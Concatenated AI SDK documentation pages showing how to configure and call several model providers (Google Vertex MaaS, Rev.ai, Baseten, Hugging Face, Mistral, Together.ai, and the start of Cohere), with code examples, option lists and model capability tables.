import { vertexMaas } from '@ai-sdk/google-vertex/maas';

If you need a customized setup, you can import createVertexMaas from @ai-sdk/google-vertex/maas and create a provider instance with your settings:

import { createVertexMaas } from '@ai-sdk/google-vertex/maas';

const vertexMaas = createVertexMaas({
  project: 'my-project', // optional
  location: 'us-east5', // optional, defaults to 'global'
});

Node.js Runtime

For Node.js environments, the Google Vertex MaaS provider supports all standard Google Cloud authentication options through the google-auth-library:

import { createVertexMaas } from '@ai-sdk/google-vertex/maas';

const vertexMaas = createVertexMaas({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

project string

The Google Cloud project ID. Defaults to the GOOGLE_VERTEX_PROJECT environment variable.
location string

The Google Cloud location, e.g. us-east5 or global. Defaults to the GOOGLE_VERTEX_LOCATION environment variable. If not set, defaults to global.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library.
headers Resolvable<Record<string, string | undefined>>

Headers to include in requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Edge Runtime

For Edge runtimes, import from @ai-sdk/google-vertex/maas/edge:

import { vertexMaas } from '@ai-sdk/google-vertex/maas/edge';

import { createVertexMaas } from '@ai-sdk/google-vertex/maas/edge';

const vertexMaas = createVertexMaas({
  project: 'my-project',
  location: 'us-east5',
});

For Edge runtime authentication, set these environment variables:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

Language Models

You can create models using the provider instance. The first argument is the model ID:

import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

Streaming is also supported:

import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { streamText } from 'ai';

const result = streamText({
  model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

Available Models

The following models are available through the MaaS provider. You can also pass any valid model ID as a string.

Model ID	Provider
`deepseek-ai/deepseek-r1-0528-maas`	DeepSeek
`deepseek-ai/deepseek-v3.1-maas`	DeepSeek
`deepseek-ai/deepseek-v3.2-maas`	DeepSeek
`openai/gpt-oss-120b-maas`	OpenAI
`openai/gpt-oss-20b-maas`	OpenAI
`meta/llama-4-maverick-17b-128e-instruct-maas`	Meta
`meta/llama-4-scout-17b-16e-instruct-maas`	Meta
`minimax/minimax-m2-maas`	MiniMax
`qwen/qwen3-coder-480b-a35b-instruct-maas`	Qwen
`qwen/qwen3-next-80b-a3b-instruct-maas`	Qwen
`qwen/qwen3-next-80b-a3b-thinking-maas`	Qwen
`moonshotai/kimi-k2-thinking-maas`	Moonshot

title: Rev.ai description: Learn how to use the Rev.ai provider for the AI SDK.

Rev.ai Provider

The Rev.ai provider contains language model support for the Rev.ai transcription API.

Setup

The Rev.ai provider is available in the @ai-sdk/revai module. You can install it with

Provider Instance

You can import the default provider instance revai from @ai-sdk/revai:

import { revai } from '@ai-sdk/revai';

If you need a customized setup, you can import createRevai from @ai-sdk/revai and create a provider instance with your settings:

import { createRevai } from '@ai-sdk/revai';

const revai = createRevai({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Rev.ai provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the REVAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Rev.ai transcription API using the .transcription() factory method.

The first argument is the model id e.g. machine.

const model = revai.transcription('machine');

import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { type RevaiTranscriptionModelOptions } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: revai.transcription('machine'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    revai: { language: 'en' } satisfies RevaiTranscriptionModelOptions,
  },
});

The following provider options are available:

metadata string

Optional metadata string to associate with the transcription job.
notification_config object

Configuration for webhook notifications when job is complete.
- url string - URL to send the notification to.
- auth_headers object - Optional authorization headers for the notification request.
  - Authorization string - Authorization header value.
delete_after_seconds integer

Number of seconds after which the job will be automatically deleted.
verbatim boolean

Whether to include filler words and false starts in the transcription.
rush boolean

[HIPAA Unsupported] Whether to prioritize the job for faster processing. Only available for human transcriber option.
test_mode boolean

Whether to run the job in test mode. Default is false.
segments_to_transcribe Array

Specific segments of the audio to transcribe.
- start number - Start time of the segment in seconds.
- end number - End time of the segment in seconds.
speaker_names Array

Names to assign to speakers in the transcription.
- display_name string - Display name for the speaker.
skip_diarization boolean

Whether to skip speaker diarization. Default is false.
skip_postprocessing boolean

Whether to skip post-processing steps. Only available for English and Spanish languages. Default is false.
skip_punctuation boolean

Whether to skip adding punctuation to the transcription. Default is false.
remove_disfluencies boolean

Whether to remove disfluencies (um, uh, etc.) from the transcription. Default is false.
remove_atmospherics boolean

Whether to remove atmospheric sounds (like <laugh>, <affirmative>) from the transcription. Default is false.
filter_profanity boolean

Whether to filter profanity from the transcription by replacing characters with asterisks except for the first and last. Default is false.
speaker_channels_count integer

Number of speaker channels in the audio. Only available for English, Spanish and French languages.
speakers_count integer

Expected number of speakers in the audio. Only available for English, Spanish and French languages.
diarization_type string

Type of diarization to use. Possible values: "standard" (default), "premium".
custom_vocabulary_id string

ID of a custom vocabulary to use for the transcription, submitted through the Custom Vocabularies API.
custom_vocabularies Array

Custom vocabularies to use for the transcription.
strict_custom_vocabulary boolean

Whether to strictly enforce custom vocabulary.
summarization_config object

Configuration for generating a summary of the transcription.
- model string - Model to use for summarization. Possible values: "standard" (default), "premium".
- type string - Format of the summary. Possible values: "paragraph" (default), "bullets".
- prompt string - Custom prompt for the summarization (mutually exclusive with type).
translation_config object

Configuration for translating the transcription.
- target_languages Array - Target languages for translation. Each item is an object with:
  - language string - Language code. Possible values: "en", "en-us", "en-gb", "ar", "pt", "pt-br", "pt-pt", "fr", "fr-ca", "es", "es-es", "es-la", "it", "ja", "ko", "de", "ru".
- model string - Model to use for translation. Possible values: "standard" (default), "premium".
language string

Language of the audio content, provided as an ISO 639-1 language code. Default is "en".
forced_alignment boolean

Whether to perform forced alignment, which provides improved accuracy for per-word timestamps. Default is false.

Currently supported languages:
- English (en, en-us, en-gb)
- French (fr)
- Italian (it)
- German (de)
- Spanish (es)
Note: This option is not available in low-cost environments.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`machine`
`low_cost`
`fusion`

title: Baseten description: Learn how to use Baseten models with the AI SDK.

Baseten Provider

Baseten is an inference platform for serving frontier, enterprise-grade opensource AI models via their API.

Setup

The Baseten provider is available via the @ai-sdk/baseten module. You can install it with

Provider Instance

You can import the default provider instance baseten from @ai-sdk/baseten:

import { baseten } from '@ai-sdk/baseten';

If you need a customized setup, you can import createBaseten from @ai-sdk/baseten and create a provider instance with your settings:

import { createBaseten } from '@ai-sdk/baseten';

const baseten = createBaseten({
  apiKey: process.env.BASETEN_API_KEY ?? '',
});

You can use the following optional settings to customize the Baseten provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://inference.baseten.co/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the BASETEN_API_KEY environment variable. It is recommended you set the environment variable using export so you do not need to include the field every time. You can grab your Baseten API Key here
modelURL string

Custom model URL for specific models (chat or embeddings). If not provided, the default Model APIs will be used.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Model APIs

const model = baseten('moonshotai/Kimi-K2-Instruct-0905');

Example

You can use Baseten language models to generate text with the generateText function:

import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';

const { text } = await generateText({
  model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
  prompt: 'What is the meaning of life? Answer in one sentence.',
});

Baseten language models can also be used in the streamText function (see AI SDK Core).

Dedicated Models

Baseten supports dedicated model URLs for both chat and embedding models. You have to specify a modelURL when creating the provider:

OpenAI-Compatible Endpoints (`/sync/v1`)

For models deployed with Baseten's OpenAI-compatible endpoints:

import { createBaseten } from '@ai-sdk/baseten';

const baseten = createBaseten({
  modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync/v1',
});
// No modelId is needed because we specified modelURL
const model = baseten();
const { text } = await generateText({
  model: model,
  prompt: 'Say hello from a Baseten chat model!',
});

`/predict` Endpoints

/predict endpoints are currently NOT supported for chat models. You must use /sync/v1 endpoints for chat functionality.

Embedding Models

You can create models that call the Baseten embeddings API using the .embeddingModel() factory method. The Baseten provider uses the high-performance @basetenlabs/performance-client for optimal embedding performance.

import { createBaseten } from '@ai-sdk/baseten';
import { embed, embedMany } from 'ai';

const baseten = createBaseten({
  modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync',
});

const embeddingModel = baseten.embeddingModel();

// Single embedding
const { embedding } = await embed({
  model: embeddingModel,
  value: 'sunny day at the beach',
});

// Batch embeddings
const { embeddings } = await embedMany({
  model: embeddingModel,
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy mountain peak',
  ],
});

Endpoint Support for Embeddings

Supported:

/sync endpoints (Performance Client automatically adds /v1/embeddings)
/sync/v1 endpoints (automatically strips /v1 before passing to Performance Client)

Not Supported:

/predict endpoints (not compatible with Performance Client)

Performance Features

The embedding implementation includes:

High-performance client: Uses @basetenlabs/performance-client for optimal performance
Automatic batching: Efficiently handles multiple texts in a single request
Connection reuse: Performance Client is created once and reused for all requests
Built-in retries: Automatic retry logic for failed requests

Error Handling

The Baseten provider includes built-in error handling for common API errors:

import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';

try {
  const { text } = await generateText({
    model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
    prompt: 'Hello, world!',
  });
} catch (error) {
  console.error('Baseten API error:', error.message);
}

Common Error Scenarios

// Embeddings require a modelURL
try {
  baseten.embeddingModel();
} catch (error) {
  // Error: "No model URL provided for embeddings. Please set modelURL option for embeddings."
}

// /predict endpoints are not supported for chat models
try {
  const baseten = createBaseten({
    modelURL:
      'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
  });
  baseten(); // This will throw an error
} catch (error) {
  // Error: "Not supported. You must use a /sync/v1 endpoint for chat models."
}

// /sync/v1 endpoints are now supported for embeddings
const baseten = createBaseten({
  modelURL:
    'https://model-{MODEL_ID}.api.baseten.co/environments/production/sync/v1',
});
const embeddingModel = baseten.embeddingModel(); // This works fine!

// /predict endpoints are not supported for embeddings
try {
  const baseten = createBaseten({
    modelURL:
      'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
  });
  baseten.embeddingModel(); // This will throw an error
} catch (error) {
  // Error: "Not supported. You must use a /sync or /sync/v1 endpoint for embeddings."
}

// Image models are not supported
try {
  baseten.imageModel('test-model');
} catch (error) {
  // Error: NoSuchModelError for imageModel
}

title: Hugging Face description: Learn how to use Hugging Face Provider.

Hugging Face Provider

The Hugging Face provider offers access to thousands of language models through Hugging Face Inference Providers, including models from Meta, DeepSeek, Qwen, and more.

API keys can be obtained from Hugging Face Settings.

Setup

The Hugging Face provider is available via the @ai-sdk/huggingface module. You can install it with:

Provider Instance

You can import the default provider instance huggingface from @ai-sdk/huggingface:

import { huggingface } from '@ai-sdk/huggingface';

For custom configuration, you can import createHuggingFace and create a provider instance with your settings:

import { createHuggingFace } from '@ai-sdk/huggingface';

const huggingface = createHuggingFace({
  apiKey: process.env.HUGGINGFACE_API_KEY ?? '',
});

You can use the following optional settings to customize the Hugging Face provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://router.huggingface.co/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the HUGGINGFACE_API_KEY environment variable. You can get your API key from Hugging Face Settings.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';

const { text } = await generateText({
  model: huggingface('deepseek-ai/DeepSeek-V3-0324'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .responses() or .languageModel() factory methods:

const model = huggingface.responses('deepseek-ai/DeepSeek-V3-0324');
// or
const model = huggingface.languageModel('moonshotai/Kimi-K2-Instruct');

Hugging Face language models can be used in the streamText function (see AI SDK Core).

You can explore the latest and trending models with their capabilities, context size, throughput and pricing on the Hugging Face Inference Models page.

Provider Options

Hugging Face language models support provider-specific options that you can pass via providerOptions.huggingface:

import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';

const { text } = await generateText({
  model: huggingface('deepseek-ai/DeepSeek-R1'),
  prompt: 'Explain the theory of relativity.',
  providerOptions: {
    huggingface: {
      reasoningEffort: 'high',
      instructions: 'Respond in a clear and educational manner.',
    },
  },
});

The following provider options are available:

metadata Record<string, string>

Additional metadata to include with the request.
instructions string

Instructions for the model. Can be used to provide additional context or guidance.
strictJsonSchema boolean

Whether to use strict JSON schema validation for structured outputs. Defaults to false.
reasoningEffort string

Controls the reasoning effort for reasoning models like DeepSeek-R1. Higher values result in more thorough reasoning.

Reasoning Output

For reasoning models like deepseek-ai/DeepSeek-R1, you can control the reasoning effort and access the model's reasoning process in the response:

import { huggingface } from '@ai-sdk/huggingface';
import { streamText } from 'ai';

const result = streamText({
  model: huggingface('deepseek-ai/DeepSeek-R1'),
  prompt: 'How many r letters are in the word strawberry?',
  providerOptions: {
    huggingface: {
      reasoningEffort: 'high',
    },
  },
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log(`Reasoning: ${part.textDelta}`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

For non-streaming calls with generateText, the reasoning content is available in the reasoning field of the response:

import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';

const result = await generateText({
  model: huggingface('deepseek-ai/DeepSeek-R1'),
  prompt: 'What is 25 * 37?',
  providerOptions: {
    huggingface: {
      reasoningEffort: 'medium',
    },
  },
});

console.log('Reasoning:', result.reasoning);
console.log('Answer:', result.text);

Image Input

For vision-capable models like Qwen/Qwen2.5-VL-7B-Instruct, you can pass images as part of the message content:

import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
import { readFileSync } from 'fs';

const result = await generateText({
  model: huggingface('Qwen/Qwen2.5-VL-7B-Instruct'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe this image in detail.' },
        {
          type: 'image',
          image: readFileSync('./image.png'),
        },
      ],
    },
  ],
});

You can also pass image URLs:

{
  type: 'image',
  image: 'https://example.com/image.png',
}

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/Llama-3.1-8B-Instruct`
`meta-llama/Llama-3.1-70B-Instruct`
`meta-llama/Llama-3.3-70B-Instruct`
`meta-llama/Llama-4-Maverick-17B-128E-Instruct`
`deepseek-ai/DeepSeek-V3.1`
`deepseek-ai/DeepSeek-V3-0324`
`deepseek-ai/DeepSeek-R1`
`deepseek-ai/DeepSeek-R1-Distill-Llama-70B`
`Qwen/Qwen3-32B`
`Qwen/Qwen3-Coder-480B-A35B-Instruct`
`Qwen/Qwen2.5-VL-7B-Instruct`
`google/gemma-3-27b-it`
`moonshotai/Kimi-K2-Instruct`

title: Mistral AI description: Learn how to use Mistral.

Mistral AI Provider

The Mistral AI provider contains language model support for the Mistral chat API.

Setup

The Mistral provider is available in the @ai-sdk/mistral module. You can install it with

Provider Instance

You can import the default provider instance mistral from @ai-sdk/mistral:

import { mistral } from '@ai-sdk/mistral';

If you need a customized setup, you can import createMistral from @ai-sdk/mistral and create a provider instance with your settings:

import { createMistral } from '@ai-sdk/mistral';

const mistral = createMistral({
  // custom settings
});

You can use the following optional settings to customize the Mistral provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.mistral.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the MISTRAL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Mistral chat API using a provider instance. The first argument is the model id, e.g. mistral-large-latest. Some Mistral chat models support tool calls.

const model = mistral('mistral-large-latest');

import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
const model = mistral('mistral-large-latest');

await generateText({
  model,
  providerOptions: {
    mistral: {
      safePrompt: true, // optional safety prompt injection
      parallelToolCalls: false, // disable parallel tool calls (one tool per response)
    } satisfies MistralLanguageModelOptions,
  },
});

The following optional provider options are available for Mistral models:

safePrompt boolean

Whether to inject a safety prompt before all conversations.

Defaults to false.
documentImageLimit number

Maximum number of images to process in a document.
documentPageLimit number

Maximum number of pages to process in a document.
strictJsonSchema boolean

Whether to use strict JSON schema validation for structured outputs. Only applies when a schema is provided and only sets the strict flag in addition to using Custom Structured Outputs, which is used by default if a schema is provided.

Defaults to false.
structuredOutputs boolean

Whether to use structured outputs. When enabled, tool calls and object generation will be strict and follow the provided schema.

Defaults to true.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. When set to false, the model will use at most one tool per response.

Defaults to true.

Document OCR

Mistral chat models support document OCR for PDF files. You can optionally set image and page limits using the provider options.

import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const result = await generateText({
  model: mistral('mistral-small-latest'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: new URL(
            'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/ai.pdf?raw=true',
          ),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
  // optional settings:
  providerOptions: {
    mistral: {
      documentImageLimit: 8,
      documentPageLimit: 64,
    } satisfies MistralLanguageModelOptions,
  },
});

Reasoning Models

Mistral offers reasoning models that provide step-by-step thinking capabilities:

magistral-small-2507: Smaller reasoning model for efficient step-by-step thinking
magistral-medium-2507: More powerful reasoning model balancing performance and cost

These models return structured reasoning content that the AI SDK extracts automatically. The reasoning is available via the reasoningText property in the result:

import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const result = await generateText({
  model: mistral('magistral-small-2507'),
  prompt: 'What is 15 * 24?',
});

console.log('REASONING:', result.reasoningText);
// Output: "Let me calculate this step by step..."

console.log('ANSWER:', result.text);
// Output: "360"

The SDK automatically parses Mistral's native reasoning format and provides separate reasoningText and text properties in the result. No middleware is needed.

Configurable Reasoning

Some Mistral models support configurable reasoning, which you can control via the reasoningEffort option.

import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const result = await generateText({
  model: mistral('mistral-small-latest'),
  prompt: 'What is 15 * 24?',
  providerOptions: {
    mistral: {
      reasoningEffort: 'high',
    } satisfies MistralLanguageModelOptions,
  },
});

console.log('REASONING:', result.reasoningText);
console.log('ANSWER:', result.text);

So far, Mistral only supports 'high' and 'none' as effort levels.

Example

You can use Mistral language models to generate text with the generateText function:

import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const { text } = await generateText({
  model: mistral('mistral-large-latest'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Mistral language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Structured Outputs

Mistral chat models support structured outputs using JSON Schema. You can use generateText or streamText with Output and Zod, Valibot, or raw JSON Schema. The SDK sends your schema via Mistral's response_format: { type: 'json_schema' }.

import { mistral } from '@ai-sdk/mistral';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: mistral('mistral-large-latest'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(z.string()),
        instructions: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a simple pasta recipe.',
});

console.log(JSON.stringify(result.output, null, 2));

You can enable strict JSON Schema validation using a provider option:

import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: mistral('mistral-large-latest'),
  providerOptions: {
    mistral: {
      strictJsonSchema: true,
    } satisfies MistralLanguageModelOptions,
  },
  output: Output.object({
    schema: z.object({
      title: z.string(),
      items: z.array(
        z.object({ id: z.string(), qty: z.number().int().min(1) }),
      ),
    }),
  }),
  prompt: 'Generate a small shopping list.',
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`pixtral-large-latest`
`mistral-large-latest`
`mistral-medium-latest`
`mistral-medium-2508`
`mistral-medium-2505`
`mistral-small-latest`
`magistral-small-2507`
`magistral-medium-2507`
`magistral-small-2506`
`magistral-medium-2506`
`ministral-3b-latest`
`ministral-8b-latest`
`pixtral-12b-2409`
`open-mistral-7b`
`open-mixtral-8x7b`
`open-mixtral-8x22b`

Embedding Models

You can create models that call the Mistral embeddings API using the .embedding() factory method.

const model = mistral.embedding('mistral-embed');

You can use Mistral embedding models to generate embeddings with the embed function:

import { mistral } from '@ai-sdk/mistral';
import { embed } from 'ai';

const { embedding } = await embed({
  model: mistral.embedding('mistral-embed'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Default Dimensions
`mistral-embed`	1024

title: Together.ai description: Learn how to use Together.ai's models with the AI SDK.

Together.ai Provider

The Together.ai provider contains support for 200+ open-source models through the Together.ai API.

Setup

The Together.ai provider is available via the @ai-sdk/togetherai module. You can install it with

Provider Instance

You can import the default provider instance togetherai from @ai-sdk/togetherai:

import { togetherai } from '@ai-sdk/togetherai';

If you need a customized setup, you can import createTogetherAI from @ai-sdk/togetherai and create a provider instance with your settings:

import { createTogetherAI } from '@ai-sdk/togetherai';

const togetherai = createTogetherAI({
  apiKey: process.env.TOGETHER_API_KEY ?? '',
});

You can use the following optional settings to customize the Together.ai provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.together.xyz/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the TOGETHER_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create Together.ai models using a provider instance. The first argument is the model id, e.g. google/gemma-2-9b-it.

const model = togetherai('google/gemma-2-9b-it');

Reasoning Models

import { togetherai } from '@ai-sdk/togetherai';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: togetherai('deepseek-ai/DeepSeek-R1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use Together.ai language models to generate text with the generateText function:

import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: togetherai('meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Together.ai language models can also be used in the streamText function (see AI SDK Core).

The Together.ai provider also supports completion models via (following the above example code) togetherai.completionModel() and embedding models via togetherai.embeddingModel().

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`moonshotai/Kimi-K2.5`
`Qwen/Qwen3.5-397B-A17B`
`MiniMaxAI/MiniMax-M2.5`
`zai-org/GLM-5`
`deepseek-ai/DeepSeek-V3.1`
`openai/gpt-oss-120b`
`openai/gpt-oss-20b`
`meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8`

Image Models

You can create Together.ai image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { togetherai } from '@ai-sdk/togetherai';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-dev'),
  prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
});

You can pass optional provider-specific request parameters using the providerOptions argument.

import {
  togetherai,
  type TogetherAIImageModelOptions,
} from '@ai-sdk/togetherai';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-dev'),
  prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
  size: '512x512',
  // Optional additional provider-specific request parameters
  providerOptions: {
    togetherai: {
      steps: 40,
    } satisfies TogetherAIImageModelOptions,
  },
});

The following provider options are available:

steps number

Number of generation steps. Higher values can improve quality.
guidance number

Guidance scale for image generation.
negative_prompt string

Negative prompt to guide what to avoid.
disable_safety_checker boolean

Disable the safety checker for image generation. When true, the API will not reject images flagged as potentially NSFW. Not available for Flux Schnell Free and Flux Pro models.

Image Editing

Together AI supports image editing through FLUX Kontext models. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-kontext-pro'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
  size: '1024x1024',
  providerOptions: {
    togetherai: {
      steps: 28,
    } satisfies TogetherAIImageModelOptions,
  },
});

Editing with URL Reference

You can also pass image URLs directly:

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-kontext-pro'),
  prompt: {
    text: 'Make the background a lush rainforest',
    images: ['https://example.com/photo.png'],
  },
  size: '1024x1024',
  providerOptions: {
    togetherai: {
      steps: 28,
    } satisfies TogetherAIImageModelOptions,
  },
});

Supported Image Editing Models

Model	Description
`black-forest-labs/FLUX.1-kontext-pro`	Production quality, balanced speed
`black-forest-labs/FLUX.1-kontext-max`	Maximum image fidelity
`black-forest-labs/FLUX.1-kontext-dev`	Development and experimentation

Model Capabilities

Available Models
`stabilityai/stable-diffusion-xl-base-1.0`
`black-forest-labs/FLUX.1-dev`
`black-forest-labs/FLUX.1-dev-lora`
`black-forest-labs/FLUX.1-schnell`
`black-forest-labs/FLUX.1-canny`
`black-forest-labs/FLUX.1-depth`
`black-forest-labs/FLUX.1-redux`
`black-forest-labs/FLUX.1.1-pro`
`black-forest-labs/FLUX.1-pro`
`black-forest-labs/FLUX.1-schnell-Free`
`black-forest-labs/FLUX.1-kontext-pro`
`black-forest-labs/FLUX.1-kontext-max`
`black-forest-labs/FLUX.1-kontext-dev`

Embedding Models

You can create Together.ai embedding models using the .embeddingModel() factory method. For more on embedding models with the AI SDK see embed().

import { togetherai } from '@ai-sdk/togetherai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: togetherai.embeddingModel('togethercomputer/m2-bert-80M-2k-retrieval'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Dimensions	Max Tokens
`BAAI/bge-large-en-v1.5`	1024	512
`Alibaba-NLP/gte-modernbert-base`	768	8192
`intfloat/multilingual-e5-large-instruct`	1024	514

Reranking Models

You can create Together.ai reranking models using the .reranking() factory method. For more on reranking with the AI SDK see rerank().

import { togetherai } from '@ai-sdk/togetherai';
import { rerank } from 'ai';

const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];

const { ranking } = await rerank({
  model: togetherai.reranking('mixedbread-ai/Mxbai-Rerank-Large-V2'),
  documents,
  query: 'talk about rain',
  topN: 2,
});

console.log(ranking);
// [
//   { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
//   { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]

Together.ai reranking models support additional provider options for object documents. You can specify which fields to use for ranking:

import {
  togetherai,
  type TogetherAIRerankingModelOptions,
} from '@ai-sdk/togetherai';
import { rerank } from 'ai';

const documents = [
  {
    from: 'Paul Doe',
    subject: 'Follow-up',
    text: 'We are happy to give you a discount of 20%.',
  },
  {
    from: 'John McGill',
    subject: 'Missing Info',
    text: 'Here is the pricing from Oracle: $5000/month',
  },
];

const { ranking } = await rerank({
  model: togetherai.reranking('mixedbread-ai/Mxbai-Rerank-Large-V2'),
  documents,
  query: 'Which pricing did we get from Oracle?',
  providerOptions: {
    togetherai: {
      rankFields: ['from', 'subject', 'text'], // Specify which fields to rank by
    } satisfies TogetherAIRerankingModelOptions,
  },
});

The following provider options are available:

rankFields string[]

Array of field names to use for ranking when documents are JSON objects. If not specified, all fields are used.

Model Capabilities

Model
`mixedbread-ai/Mxbai-Rerank-Large-V2`

title: Cohere description: Learn how to use the Cohere provider for the AI SDK.

Cohere Provider

The Cohere provider contains language and embedding model support for the Cohere chat API.

Setup

The Cohere provider is available in the @ai-sdk/cohere module. You can install it with

Provider Instance

You can import the default provider instance cohere from @ai-sdk/cohere:

import { cohere } from '@ai-sdk/cohere';

If you need a customized setup, you can import createCohere from @ai-sdk/cohere and create a provider instance with your settings:

import { createCohere } from '@ai-sdk/cohere';

const cohere = createCohere({
  // custom settings
});

You can use the following optional settings to customize the Cohere provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.cohere.com/v2.
apiKey string

API key that is being sent using the Authorization header. It defaults to the COHERE_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
generateId () => string

